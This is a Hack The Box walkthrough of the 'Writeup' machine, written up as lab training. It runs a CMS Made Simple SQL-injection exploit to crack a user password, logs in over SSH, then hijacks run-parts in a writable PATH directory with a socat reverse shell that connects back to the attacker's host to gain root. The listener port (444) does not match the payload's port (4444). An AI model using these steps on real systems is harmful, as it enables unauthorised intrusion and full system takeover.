HTB: Writeup

Details

This machine is Writeup from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.032s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

I ran some nmap scripts against this

root@kali:~# nmap -sVC -T4 10.10.10.138
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 20:35 BST
Nmap scan report for 10.10.10.138
Host is up (0.033s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds

User

So onto the web server

Screenshot 1

Onto the writeup dir

Screenshot 2

Wappalyzer told me this was cms made simple, which I was able to confirm from the html

Screenshot 3

Some googling led to https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html, I modified this increasing the time variable to 3. Before running it

root@kali:~# python exploit.py -u http://10.10.10.138/writeup/ -w /usr/share/wordlists/rockyou.txt -c
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

I tried to login with the creds

jkr:raykayjay9

On the cms, but it didn't work. So I tried on ssh

root@kali:~# ssh jkr@10.10.10.138
jkr@writeup:~$ 

And grabbed the user flag

jkr@writeup:~$ ls -la
total 28
drwxr-xr-x 3 jkr  jkr  4096 Jun 13 15:41 .
drwxr-xr-x 3 root root 4096 Apr 19 04:14 ..
lrwxrwxrwx 1 root root    9 Apr 19 06:42 .bash_history -> /dev/null
-rw-r--r-- 1 jkr  jkr   220 Apr 19 04:14 .bash_logout
-rw-r--r-- 1 jkr  jkr  3526 Apr 19 04:14 .bashrc
drwxr-xr-x 2 jkr  jkr  4096 Jun 13 15:41 .nano
-rw-r--r-- 1 jkr  jkr   675 Apr 19 04:14 .profile
-r--r--r-- 1 root root   33 Apr 19 08:43 user.txt

jkr@writeup:~$ cat user.txt 
[REDACTED]

A bit of enumeration didn't get me anywhere. So I moved pspy over to the box and ran it

jkr@writeup:/tmp$ ./pspy64
[SNIP]
2019/06/13 16:24:01 CMD: UID=0    PID=2370   | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1
[SNIP]

And when I opened my second terminal, I also noticed

2019/06/13 16:27:15 CMD: UID=0    PID=2499   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
2019/06/13 16:27:15 CMD: UID=0    PID=2500   | run-parts --lsbsysinit /etc/update-motd.d 
2019/06/13 16:27:15 CMD: UID=0    PID=2501   | /bin/sh /etc/update-motd.d/10-uname 
2019/06/13 16:27:15 CMD: UID=0    PID=2502   | sshd: jkr [priv] 

Of note was run-parts being ran without a fully qualified path. Along with

jkr@writeup:/sbin$ find / -type d -writable 2>/dev/nul
[SNIP]
/usr/local/sbin
[SNIP]

This dir being writable meant I would be able to replace the binary that was run by this. This box didn't have nc but did have socat, so using vi

jkr@writeup:/sbin$ vi /usr/local/sbin/run-parts

I put the following into the file

socat tcp-connect:10.10.14.29:4444 exec:"bash -li",pty,stderr,setsid,sigint,sane

And then chmod it

jkr@writeup:~$ chmod +x /usr/local/sbin/run-parts

I then ran a listener in socat locally

root@kali:~# socat file:`tty`,raw,echo=0 tcp-listen:444

To trigger this I disconnected from ssh and reconnected. When I checked my listener

root@writeup:/# 

I had a root shell, flag time

root@writeup:/# cd /root
root@writeup:/root# ls -la
drwx------  4 root root 4096 May  1 09:43 .
drwxr-xr-x 22 root root 4096 Apr 19 07:31 ..
lrwxrwxrwx  1 root root    9 Apr 19 06:42 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jun  3  2018 .bashrc
drwxr-xr-x  2 root root 4096 May  1 09:43 .nano
-rw-r--r--  1 root root  148 Jun  3  2018 .profile
drwx------  2 root root 4096 May  1 09:53 bin
-r--------  1 root root   33 Apr 19 08:44 root.txt

root@writeup:/root# cat root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *